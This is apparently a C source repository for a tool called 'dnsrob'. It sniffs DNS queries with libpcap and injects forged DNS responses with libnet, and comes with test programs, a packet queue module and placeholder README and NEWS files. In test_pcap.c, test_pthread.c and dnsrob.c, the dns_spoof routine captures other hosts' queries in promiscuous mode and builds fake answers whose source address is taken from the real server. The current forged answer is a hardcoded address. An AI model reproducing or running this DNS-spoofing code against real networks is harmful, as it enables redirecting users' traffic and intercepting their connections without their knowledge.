README
Sample readme file for dnspy2 project.


NEWS
Sample NEWS file for dnspy2 project.


src/test_pcap.c
/*
 ============================================================================
 Name        : test_pcap.c
 Author      : Yang Liu
 Version     :
 Copyright   : Runstone Co.
 Description : test libpcap in C, Ansi-style
 ============================================================================
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>
#include <signal.h>

#include <resolv.h>
#include <arpa/nameser.h>
#include <libnet.h>

#include <pcap.h>
#include "log.h"

void usage();
void cleanup(int sig);
int pcap_dloff(pcap_t *pd);
void dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt);


static pcap_t *pd = NULL;
int pcap_off = -1;
libnet_t *l = NULL;

int
main(int argc, char* argv[])
{
/*
	get_options();
	show_message();
	get_pid();
	time_init();
	log_init();

	save_options();
	process_options();
	os_init();

	test_config();
	process_signals();

	get_config();
	init_signals();
	do_daemon();

	create_pid_file();
*/
	char *p, *dev, *mydnsip, buf[1024];
	char errbuf[PCAP_ERRBUF_SIZE];
	int i;

	dev = mydnsip = NULL;

	while ((i = getopt(argc, argv, "i:r:h?")) != -1) {
		switch (i) {
		case 'i':
			dev = optarg;
			break;
		case 'r':
			mydnsip = optarg;
			break;
		default:
			//usage();
			break;
		}
	}


	if(mydnsip == NULL)
	{
		log_stderr(1, "%s", "Error! Must set resolver ip with -r");
	    return 1;
	}

	if(getuid())
	{
		log_stderr(1, "%s", "Error! Must be root ... exiting");
	    return 1;
	}

	if (dev == NULL && (dev = pcap_lookupdev(errbuf)) == NULL)
	{
		log_stderr(1, "pcap_lookupdev err: %s", errbuf);
		return 1;
	}

	//on Linux systems with 2.2 or later kernels, a device
    //argument of "any" or NULL can be  used  to  capture  packets  from  all
    //interfaces. but if an argument of "any" or NULL is supplied, the promisc flag is ignored

	snprintf(buf, sizeof(buf), "udp dst port 53 and not net %s", mydnsip);

	pcap_t *pd;
	bpf_u_int32 net, mask = 0;
	struct bpf_program filter;

	pd = pcap_open_live(dev, 65536, 1, 512, errbuf);
	if(pd == NULL)
	{
		log_stderr(1, "pcap_open_live err: %s", errbuf);
		return 1;
	}

	//network mask may useless in this use case, so we juse leave mask as 0.
	/*
	if (pcap_lookupnet(dev, &net, &mask, ebuf) == -1)
	{
		log_stderr(1, "pcap_lookupnet err: %s", errbuf);
		return 1;
	}
*/
	if (pcap_compile(pd, &filter, buf, 1, mask) < 0) {
		pcap_perror(pd, "pcap_compile");
		return 1;
	}

	if (pcap_setfilter(pd, &filter) == -1) {
		pcap_perror(pd, "pcap_setfilter");
		return 1;
	}

	pcap_off = pcap_dloff(pd);

	//pcap_dloff(pd)

	//char errbuf[LIBNET_ERRBUF_SIZE];
    l = libnet_init(
            LIBNET_RAW4,                            /* injection type */
            dev,                                   /* network interface */
            errbuf);                                /* error buffer */
    if (!l)
    {
        log_stderr(1, "libnet_init: %s", errbuf);
        return 1;
    }

	libnet_seed_prand(l);

	//

	signal(SIGHUP, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGTERM, cleanup);

	pcap_loop(pd, -1, dns_spoof, NULL);
}

void
cleanup(int sig)
{
	libnet_destroy(l);
	pcap_close(pd);
	exit(0);
}

int
pcap_dloff(pcap_t *pd)
{
	int offset = -1;

	switch (pcap_datalink(pd))
	{
		case DLT_EN10MB:
			offset = 14;
			break;
		case DLT_IEEE802:
			offset = 22;
			break;
		case DLT_FDDI:
			offset = 21;
			break;
		case DLT_NULL:
			offset = 4;
			break;
		default:
			log_stderr(1, "unsupported datalink type");
			break;
	}
	return (offset);
}

void
dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
	struct libnet_ipv4_hdr *ip;
	struct libnet_udp_hdr *udp;
	HEADER *dns;

	char name[MAXHOSTNAMELEN];
	u_char *p, *q, *end, buf[1024];
	int i, anslen, dnslen;
	struct in_addr dst;
	u_short type, class;

	ip = (struct libnet_ipv4_hdr *)(pkt + pcap_off);
	udp = (struct libnet_udp_hdr *)(pkt + pcap_off + (ip->ip_hl * 4));
	dns = (HEADER *)(udp + 1);
	p = (u_char *)(dns + 1);
	end = (u_char *)pkt + pkthdr->caplen;

	if ((dnslen = end - (u_char *)dns) < sizeof(*dns))
		return;

	if (dns->opcode != QUERY || ntohs(dns->qdcount) != 1 ||
	    dns->ancount || dns->nscount || dns->arcount)
		return;

	if ((i = dn_expand((u_char *)dns, end, p, name, sizeof(name))) < 0)
		return;

	p += i;
	GETSHORT(type, p);
	GETSHORT(class, p);

	if (class != C_IN)
		return;

	fprintf(stderr, "query type is %d, name is %s\n", type, name);

//	p = buf + IP_H + UDP_H + dnslen;

	//in_addr_t dst;

	libnet_ptag_t ptag;

	//p = buf + LIBNET_IPV4_H + LIBNET_UDP_H + dnslen;
	p = buf + dnslen;
	//tmp
	inet_aton("127.0.0.1", &dst);
	memcpy(p, "\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04",
	       12);
	memcpy(p + 12, &dst.s_addr, sizeof(dst.s_addr));
	anslen = 16;
	//tmp

	//memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, (u_char *)dns, dnslen);
	memcpy(buf, (u_char *)dns, dnslen);

	//dns = (HEADER *)(buf + LIBNET_IPV4_H + LIBNET_UDP_H);
	dns = (HEADER *)(buf);
	dns->qr = dns->ra = 1;
	//if (type == T_PTR) dns->aa = 1;
	dns->ancount = htons(1);

	dnslen += anslen;

	ptag = libnet_build_udp(
			ntohs(udp->uh_dport),
			ntohs(udp->uh_sport),
			LIBNET_UDP_H + dnslen,
			0,
			buf,
			dnslen,
			l,
			0);
	if(ptag == -1)
	{
		log_stderr(1, "libnet_build_udp err\n");
		return;
	}

	ptag = libnet_build_ipv4(
			LIBNET_IPV4_H + LIBNET_UDP_H + dnslen,
			0,
			libnet_get_prand(LIBNET_PRu16),
			0,
			64,
			IPPROTO_UDP,
			0,
			ip->ip_dst.s_addr,
			ip->ip_src.s_addr,
			NULL,
			0,
			l,
			0);

	if(ptag == -1)
	{
		log_stderr(1, "libnet_build_ipv4 err\n");
		return;
	}

	int c = libnet_write(l);

    if (c == -1)
    {
        log_stderr(1, "Write error: %s\n", libnet_geterror(l));
        return;
    }
    else
    {
        log_stderr(1, "Wrote %d byte DNS packet; check the wire.\n", c);
    }

    libnet_clear_packet(l);
    //libnet_destroy(l);

}


src/test_pthread.c
/*
 ============================================================================
 Name        : test_pthread.c
 Author      : Yang Liu
 Version     :
 Copyright   : Runstone Co.
 Description : test libpcap in C, Ansi-style
 ============================================================================
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>
#include <signal.h>

#include <resolv.h>
#include <arpa/nameser.h>
#include <libnet.h>

#include <pthread.h>
#include <pcap.h>
#include "log.h"
#include "dq_data.h"
#include "dnsrob.h"

void usage();
void cleanup(int sig);
int pcap_dloff(pcap_t *pd);
void dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt);
void send_dns(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt);

#ifndef HAVE_SIGIGNORE
static int sigignore(int sig) {
    struct sigaction sa = { .sa_handler = SIG_IGN, .sa_flags = 0 };

    if (sigemptyset(&sa.sa_mask) == -1 || sigaction(sig, &sa, 0) == -1) {
        return -1;
    }
    return 0;
}
#endif



static pcap_t *pd = NULL;
int pcap_off = -1;
libnet_t *l = NULL;
DQ* freeDQ = NULL;
DNS_THREAD g_thread;

struct ub_ctx* g_ctx;

int
main(int argc, char* argv[])
{
/*
	get_options();
	show_message();
	get_pid();
	time_init();
	log_init();

	save_options();
	process_options();
	os_init();

	test_config();
	process_signals();

	get_config();
	init_signals();
	do_daemon();

	create_pid_file();
*/
	char *p, *dev, *mydnsip, buf[1024];
	char errbuf[PCAP_ERRBUF_SIZE];
	int i;

	dev = mydnsip = NULL;

	while ((i = getopt(argc, argv, "i:r:h?")) != -1) {
		switch (i) {
		case 'i':
			dev = optarg;
			break;
		case 'r':
			mydnsip = optarg;
			break;
		default:
			//usage();
			break;
		}
	}


	if(mydnsip == NULL)
	{
		log_stderr(1, "%s", "Error! Must set resolver ip with -r");
	    return 1;
	}

	if(getuid())
	{
		log_stderr(1, "%s", "Error! Must be root ... exiting");
	    return 1;
	}

	if (dev == NULL && (dev = pcap_lookupdev(errbuf)) == NULL)
	{
		log_stderr(1, "pcap_lookupdev err: %s", errbuf);
		return 1;
	}

	//on Linux systems with 2.2 or later kernels, a device
    //argument of "any" or NULL can be  used  to  capture  packets  from  all
    //interfaces. but if an argument of "any" or NULL is supplied, the promisc flag is ignored

	snprintf(buf, sizeof(buf), "udp dst port 53 and not net %s", mydnsip);

	pcap_t *pd;
	bpf_u_int32 net, mask = 0;
	struct bpf_program filter;

	pd = pcap_open_live(dev, 65536, 1, 512, errbuf);
	if(pd == NULL)
	{
		log_stderr(1, "pcap_open_live err: %s", errbuf);
		return 1;
	}

	//network mask may useless in this use case, so we juse leave mask as 0.
	/*
	if (pcap_lookupnet(dev, &net, &mask, ebuf) == -1)
	{
		log_stderr(1, "pcap_lookupnet err: %s", errbuf);
		return 1;
	}
*/
	if (pcap_compile(pd, &filter, buf, 1, mask) < 0) {
		pcap_perror(pd, "pcap_compile");
		return 1;
	}

	if (pcap_setfilter(pd, &filter) == -1) {
		pcap_perror(pd, "pcap_setfilter");
		return 1;
	}

	pcap_off = pcap_dloff(pd);

	//pcap_dloff(pd)

	//char errbuf[LIBNET_ERRBUF_SIZE];
    l = libnet_init(
            LIBNET_RAW4,                            /* injection type */
            dev,                                   /* network interface */
            errbuf);                                /* error buffer */
    if (!l)
    {
        log_stderr(1, "libnet_init: %s", errbuf);
        return 1;
    }

	libnet_seed_prand(l);

	//

	signal(SIGHUP, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGTERM, cleanup);
	signal(SIGQUIT, cleanup);

	sigignore(SIGPIPE);

	thread_init();

	//pcap_loop(pd, -1, dns_spoof, NULL);
	pcap_loop(pd, -1, send_dns, NULL);
}

void
cleanup(int sig)
{
	libnet_destroy(l);
//	pcap_breakloop(pd);
//	pcap_close(pd);
	exit(EXIT_SUCCESS);
}

int
pcap_dloff(pcap_t *pd)
{
	int offset = -1;

	switch (pcap_datalink(pd))
	{
		case DLT_EN10MB:
			offset = 14;
			break;
		case DLT_IEEE802:
			offset = 22;
			break;
		case DLT_FDDI:
			offset = 21;
			break;
		case DLT_NULL:
			offset = 4;
			break;
		default:
			log_stderr(1, "unsupported datalink type");
			break;
	}
	return (offset);
}

void
send_dns(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
	DQ_ITEM *item = DQ_pop(freeDQ);
	if(NULL == item)
		return;

	memcpy(item->pkt, pkt, pkthdr->caplen);
	item->pkt_len = pkthdr->caplen;

	DQ_push(g_thread.m_DQ, item);

	if (write(g_thread.notify_send_fd, "", 1) != 1)
	{
		log_stderr(1, "Writing to thread notify pipe");
	}
	//log_stderr(1, "send one\n");
}

void
dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
	struct libnet_ipv4_hdr *ip;
	struct libnet_udp_hdr *udp;
	HEADER *dns;

	char name[MAXHOSTNAMELEN];
	u_char *p, *q, *end, buf[1024];
	int i, anslen, dnslen;
	struct in_addr dst;
	u_short type, class;

	ip = (struct libnet_ipv4_hdr *)(pkt + pcap_off);
	udp = (struct libnet_udp_hdr *)(pkt + pcap_off + (ip->ip_hl * 4));
	dns = (HEADER *)(udp + 1);
	p = (u_char *)(dns + 1);
	end = (u_char *)pkt + pkthdr->caplen;

	if ((dnslen = end - (u_char *)dns) < sizeof(*dns))
		return;

	if (dns->opcode != QUERY || ntohs(dns->qdcount) != 1 ||
	    dns->ancount || dns->nscount || dns->arcount)
		return;

	if ((i = dn_expand((u_char *)dns, end, p, name, sizeof(name))) < 0)
		return;

	p += i;
	GETSHORT(type, p);
	GETSHORT(class, p);

	if (class != C_IN)
		return;

	fprintf(stderr, "query type is %d, name is %s\n", type, name);

//	p = buf + IP_H + UDP_H + dnslen;

	//in_addr_t dst;

	libnet_ptag_t ptag;

	//p = buf + LIBNET_IPV4_H + LIBNET_UDP_H + dnslen;
	p = buf + dnslen;
	//tmp
	inet_aton("127.0.0.1", &dst);
	memcpy(p, "\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04",
	       12);
	memcpy(p + 12, &dst.s_addr, sizeof(dst.s_addr));
	anslen = 16;
	//tmp

	//memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, (u_char *)dns, dnslen);
	memcpy(buf, (u_char *)dns, dnslen);

	//dns = (HEADER *)(buf + LIBNET_IPV4_H + LIBNET_UDP_H);
	dns = (HEADER *)(buf);
	dns->qr = dns->ra = 1;
	//if (type == T_PTR) dns->aa = 1;
	dns->ancount = htons(1);

	dnslen += anslen;

	ptag = libnet_build_udp(
			ntohs(udp->uh_dport),
			ntohs(udp->uh_sport),
			LIBNET_UDP_H + dnslen,
			0,
			buf,
			dnslen,
			l,
			0);
	if(ptag == -1)
	{
		log_stderr(1, "libnet_build_udp err\n");
		return;
	}

	ptag = libnet_build_ipv4(
			LIBNET_IPV4_H + LIBNET_UDP_H + dnslen,
			0,
			libnet_get_prand(LIBNET_PRu16),
			0,
			64,
			IPPROTO_UDP,
			0,
			ip->ip_dst.s_addr,
			ip->ip_src.s_addr,
			NULL,
			0,
			l,
			0);

	if(ptag == -1)
	{
		log_stderr(1, "libnet_build_ipv4 err\n");
		return;
	}

	int c = libnet_write(l);

    if (c == -1)
    {
        log_stderr(1, "Write error: %s\n", libnet_geterror(l));
        return;
    }
    else
    {
        log_stderr(1, "Wrote %d byte DNS packet; check the wire.\n", c);
    }

    libnet_clear_packet(l);
    //libnet_destroy(l);

}


src/test_unbound.c

/*
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <stdarg.h>
#include <stdlib.h>
#include <assert.h>
#include <time.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
*/


#include <stdio.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <unbound.h>
#include <errno.h>
#include <signal.h>

#include "log.h"


struct ub_ctx* ctx;
volatile int done = 0;

int is_pipe = 1;
static int used, avail;
static char *buf;

/* This is called when resolution is completed */
void mycallback(void* mydata, int err, struct ub_result* result)
{
	int* done = (int*)mydata;
	*done = 1;
	if(err != 0) {
		printf("resolve error: %s\n", ub_strerror(err));
		return;
	}
	/* show first result */
	if(result->havedata)
		printf("The address of %s is %s\n", result->qname,
			inet_ntoa(*(struct in_addr*)result->data[0]));

	ub_resolve_free(result);
}


void process_optarg(const char* buf)
{

	int retval = ub_resolve_async(ctx, buf,
		1 /* TYPE A (IPv4 address) */,
		1 /* CLASS IN (internet) */,
		(void*)&done, mycallback, NULL);
	if(retval != 0) {
		printf("resolve error: %s\n", ub_strerror(retval));
		return;
	}
}


static void read_stdin(void)
{
	char buffer[1024];
	int r;
	memset(buffer, 0x0, 1024);

	do
	{
		r = read(0, buffer, 1024);
	} while (r < 0 && errno == EINTR);

	if (r == 0)
	{
		is_pipe=0;
		return;
	}
	if (r < 0)
	{
		printf("read stdin error: %s\n", strerror(errno));
		exit(1);
	}
	buffer[r-1]=0;
	printf("buffer is: %s, lenth is: %d\n", buffer, r);

	process_optarg(buffer);
}

int main(void)
{
	int retval;
	int i = 0;
	signal(SIGPIPE,SIG_IGN);
	/* create context */
	ctx = ub_ctx_create();
	if(!ctx) {
		printf("error: could not create unbound context\n");
		return 1;
	}
	ub_ctx_set_fwd(ctx, "8.8.8.8");

	/* asynchronous query for webserver */
	retval = ub_resolve_async(ctx, "www.nlnetlabs.nl",
		1 /* TYPE A (IPv4 address) */,
		1 /* CLASS IN (internet) */,
		(void*)&done, mycallback, NULL);
	if(retval != 0) {
		printf("resolve error: %s\n", ub_strerror(retval));
		return 1;
	}

	int u_fd = ub_fd(ctx);

	int maxfd;
	fd_set readfds;
	struct timeval *tv, tvbuf;

	while(1)
	{
		maxfd= u_fd + 1;
		FD_ZERO(&readfds);
		if(is_pipe) FD_SET(0,&readfds);
		FD_SET(u_fd, &readfds);
		tv = 0;
		retval = select(maxfd, &readfds, NULL, NULL, NULL);
		if(retval == -1) // 0 for timeout
		{
			if (errno == EINTR) continue;
			printf("select error! \n");
			exit(1);
		}
		if FD_ISSET(0, &readfds)
		{
			printf("now read stdin \n");
			read_stdin();
		}
		if FD_ISSET(u_fd, &readfds)
		{
			printf("now ub_process \n");
			retval = ub_process(ctx);
			if(retval != 0) {
				printf("resolve error: %s\n", ub_strerror(retval));
				return 1;
			}
		}


	}


	/* we keep running, lets do something while waiting */
/*
	while(!done) {
		usleep(100000);  wait 1/10 of a second
		printf("time passed (%d) ..\n", i++);
		retval = ub_process(ctx);
		if(retval != 0) {
			printf("resolve error: %s\n", ub_strerror(retval));
			return 1;
		}
	}

	printf("done\n");*/

	ub_ctx_delete(ctx);
	return 0;
}


src/dq_data.c

#include <pthread.h>

#include "dq_data.h"
#include "log.h"

void DQ_init(DQ* dq)
{
	pthread_mutex_init(&dq->lock, NULL);
	pthread_cond_init(&dq->cond, NULL);
	dq->head = NULL;
	dq->tail = NULL;
	dq->num = 0;
}


DQ_ITEM *DQ_pop(DQ *dq)
{
    DQ_ITEM *item;

    pthread_mutex_lock(&dq->lock);
    item = dq->head;
    if (NULL != item)
    {
        dq->head = item->next;
        dq->num--;
        if (NULL == dq->head)
            dq->tail = NULL;
    }
    pthread_mutex_unlock(&dq->lock);

    return item;
}

void DQ_push(DQ *dq, DQ_ITEM *item)
{
    item->next = NULL;

    pthread_mutex_lock(&dq->lock);
    dq->num++;
    if (NULL == dq->tail)
        dq->head = item;
    else
        dq->tail->next = item;
    dq->tail = item;
    //pthread_cond_signal(&dq->cond);
    pthread_mutex_unlock(&dq->lock);
}

void DQ_ITEM_init(DQ_ITEM *item)
{
	memset(item->pkt, 0x00, MAX_PKT_SIZE);
	item->pkt_len = 0;
	item->next = NULL;
}

u_int32_t freeDQ_init(DQ* freeDQ, const u_int32_t n)
{
	DQ_init(freeDQ);

	DQ_ITEM *item = NULL;
	u_int32_t num, i;

	if(0 == n)
		num = 1000;
	else
		num = n;

	item = malloc(sizeof(DQ_ITEM) * num);
	if(NULL == item)
		return -1;

	for(i = 1; i < num; i++)
	{
		DQ_ITEM_init(&item[i-1]);
		item[i-1].next = &item[i];
	}
	DQ_ITEM_init(&item[num-1]);

	pthread_mutex_lock(&freeDQ->lock);
	freeDQ->head = &item[0];
	freeDQ->tail = &item[num-1];
	freeDQ->num = num;
	pthread_mutex_unlock(&freeDQ->lock);

	return num;
}


src/dnsrob.c
/*
 ============================================================================
 Name        : dnsrob.c
 Author      : Yang Liu
 Version     :
 Copyright   : Runstone Co.
 Description : dnsrob in C, Ansi-style
 ============================================================================
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>
#include <signal.h>

#include <resolv.h>
#include <arpa/nameser.h>
#include <libnet.h>

#include <pthread.h>
#include <pcap.h>
#include <unbound.h>
#include "log.h"
#include "dq_data.h"
#include "dnsrob.h"

void usage();
void cleanup(int sig);
int pcap_dloff(pcap_t *pd);
void dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt);
void send_dns(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt);

#ifndef HAVE_SIGIGNORE
static int sigignore(int sig) {
    struct sigaction sa = { .sa_handler = SIG_IGN, .sa_flags = 0 };

    if (sigemptyset(&sa.sa_mask) == -1 || sigaction(sig, &sa, 0) == -1) {
        return -1;
    }
    return 0;
}
#endif



static pcap_t *pd = NULL;
int pcap_off = -1;
libnet_t *l = NULL;
DQ* freeDQ = NULL;
DNS_THREAD g_thread;
struct ub_ctx* g_ctx;

int
main(int argc, char* argv[])
{
/*
	get_options();
	show_message();
	get_pid();
	time_init();
	log_init();

	save_options();
	process_options();
	os_init();

	test_config();
	process_signals();

	get_config();
	init_signals();
	do_daemon();

	create_pid_file();
*/
	char *p, *dev, *mydnsip, buf[1024];
	char errbuf[PCAP_ERRBUF_SIZE];
	int i;

	dev = mydnsip = NULL;

	while ((i = getopt(argc, argv, "s:v:i:r:h?")) != -1) {
		switch (i) {
		case 'i':
			dev = optarg;
			break;
		case 'r':
			mydnsip = optarg;
			break;
		case 'v':
			verbosity = atoi(optarg);
			break;
		case 's':
			free_num = atoi(optarg);
			break;
		default:
			//usage();
			break;
		}
	}


	if(mydnsip == NULL)
	{
		log_stderr(1, "%s", "Error! Must set resolver ip with -r");
	    return 1;
	}

	if(getuid())
	{
		log_stderr(1, "%s", "Error! Must be root ... exiting");
	    return 1;
	}

	if (dev == NULL && (dev = pcap_lookupdev(errbuf)) == NULL)
	{
		log_stderr(1, "pcap_lookupdev err: %s", errbuf);
		return 1;
	}

	//on Linux systems with 2.2 or later kernels, a device
    //argument of "any" or NULL can be  used  to  capture  packets  from  all
    //interfaces. but if an argument of "any" or NULL is supplied, the promisc flag is ignored

	snprintf(buf, sizeof(buf), "udp dst port 53 and not net %s", mydnsip);

	pcap_t *pd;
	bpf_u_int32 net, mask = 0;
	struct bpf_program filter;

	pd = pcap_open_live(dev, 65536, 1, 512, errbuf);
	if(pd == NULL)
	{
		log_stderr(1, "pcap_open_live err: %s", errbuf);
		return 1;
	}

	//network mask may useless in this use case, so we juse leave mask as 0.
	/*
	if (pcap_lookupnet(dev, &net, &mask, ebuf) == -1)
	{
		log_stderr(1, "pcap_lookupnet err: %s", errbuf);
		return 1;
	}
*/
	if (pcap_compile(pd, &filter, buf, 1, mask) < 0) {
		pcap_perror(pd, "pcap_compile");
		return 1;
	}

	if (pcap_setfilter(pd, &filter) == -1) {
		pcap_perror(pd, "pcap_setfilter");
		return 1;
	}

	pcap_off = pcap_dloff(pd);

	//pcap_dloff(pd)

	//char errbuf[LIBNET_ERRBUF_SIZE];
    l = libnet_init(
            LIBNET_RAW4,                            /* injection type */
            dev,                                   /* network interface */
            errbuf);                                /* error buffer */
    if (!l)
    {
        log_stderr(1, "libnet_init: %s", errbuf);
        return 1;
    }

	libnet_seed_prand(l);

	//

	signal(SIGHUP, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGTERM, cleanup);
	signal(SIGQUIT, cleanup);

	sigignore(SIGPIPE);

	g_ctx = ub_ctx_create();
	if(!g_ctx) {
		printf("error: could not create unbound context\n");
		return 1;
	}
	ub_ctx_set_fwd(g_ctx, mydnsip);


	thread_init();

	//pcap_loop(pd, -1, dns_spoof, NULL);
	pcap_loop(pd, -1, send_dns, NULL);
}

void
cleanup(int sig)
{
	set_isdone();
	libnet_destroy(l);
//	pcap_breakloop(pd);
//	pcap_close(pd);
//	ub_ctx_delete(g_ctx);

	//pthread_join(g_thread.thread_id, NULL);
	exit(EXIT_SUCCESS);
}

int
pcap_dloff(pcap_t *pd)
{
	int offset = -1;

	switch (pcap_datalink(pd))
	{
		case DLT_EN10MB:
			offset = 14;
			break;
		case DLT_IEEE802:
			offset = 22;
			break;
		case DLT_FDDI:
			offset = 21;
			break;
		case DLT_NULL:
			offset = 4;
			break;
		default:
			log_stderr(1, "unsupported datalink type");
			break;
	}
	return (offset);
}

void set_isdone()
{
	isdone = 1;
	if (write(g_thread.notify_send_fd, "", 1) != 1)
	{
		log_stderr(1, "Writing to thread notify pipe");
	}
}

void
send_dns(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
	DQ_ITEM *item = DQ_pop(freeDQ);
	if(NULL == item)
		return;

	memcpy(item->pkt, pkt, pkthdr->caplen);
	item->pkt_len = pkthdr->caplen;

	DQ_push(g_thread.m_DQ, item);

	if (write(g_thread.notify_send_fd, "", 1) != 1)
	{
		log_stderr(1, "Writing to thread notify pipe");
	}
	//log_stderr(1, "send one\n");
}

void
dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
	struct libnet_ipv4_hdr *ip;
	struct libnet_udp_hdr *udp;
	HEADER *dns;

	char name[MAXHOSTNAMELEN];
	u_char *p, *q, *end, buf[1024];
	int i, anslen, dnslen;
	struct in_addr dst;
	u_short type, class;

	ip = (struct libnet_ipv4_hdr *)(pkt + pcap_off);
	udp = (struct libnet_udp_hdr *)(pkt + pcap_off + (ip->ip_hl * 4));
	dns = (HEADER *)(udp + 1);
	p = (u_char *)(dns + 1);
	end = (u_char *)pkt + pkthdr->caplen;

	if ((dnslen = end - (u_char *)dns) < sizeof(*dns))
		return;

	if (dns->opcode != QUERY || ntohs(dns->qdcount) != 1 ||
	    dns->ancount || dns->nscount || dns->arcount)
		return;

	if ((i = dn_expand((u_char *)dns, end, p, name, sizeof(name))) < 0)
		return;

	p += i;
	GETSHORT(type, p);
	GETSHORT(class, p);

	if (class != C_IN)
		return;

	fprintf(stderr, "query type is %d, name is %s\n", type, name);

//	p = buf + IP_H + UDP_H + dnslen;

	//in_addr_t dst;

	libnet_ptag_t ptag;

	//p = buf + LIBNET_IPV4_H + LIBNET_UDP_H + dnslen;
	p = buf + dnslen;
	//tmp
	inet_aton("127.0.0.1", &dst);
	memcpy(p, "\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04",
	       12);
	memcpy(p + 12, &dst.s_addr, sizeof(dst.s_addr));
	anslen = 16;
	//tmp

	//memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, (u_char *)dns, dnslen);
	memcpy(buf, (u_char *)dns, dnslen);

	//dns = (HEADER *)(buf + LIBNET_IPV4_H + LIBNET_UDP_H);
	dns = (HEADER *)(buf);
	dns->qr = dns->ra = 1;
	//if (type == T_PTR) dns->aa = 1;
	dns->ancount = htons(1);

	dnslen += anslen;

	ptag = libnet_build_udp(
			ntohs(udp->uh_dport),
			ntohs(udp->uh_sport),
			LIBNET_UDP_H + dnslen,
			0,
			buf,
			dnslen,
			l,
			0);
	if(ptag == -1)
	{
		log_stderr(1, "libnet_build_udp err\n");
		return;
	}

	ptag = libnet_build_ipv4(
			LIBNET_IPV4_H + LIBNET_UDP_H + dnslen,
			0,
			libnet_get_prand(LIBNET_PRu16),
			0,
			64,
			IPPROTO_UDP,
			0,
			ip->ip_dst.s_addr,
			ip->ip_src.s_addr,
			NULL,
			0,
			l,
			0);

	if(ptag == -1)
	{
		log_stderr(1, "libnet_build_ipv4 err\n");
		return;
	}

	int c = libnet_write(l);

    if (c == -1)
    {
        log_stderr(1, "Write error: %s\n", libnet_geterror(l));
        return;
    }
    else
    {
        log_stderr(1, "Wrote %d byte DNS packet; check the wire.\n", c);
    }

    libnet_clear_packet(l);
    //libnet_destroy(l);

}
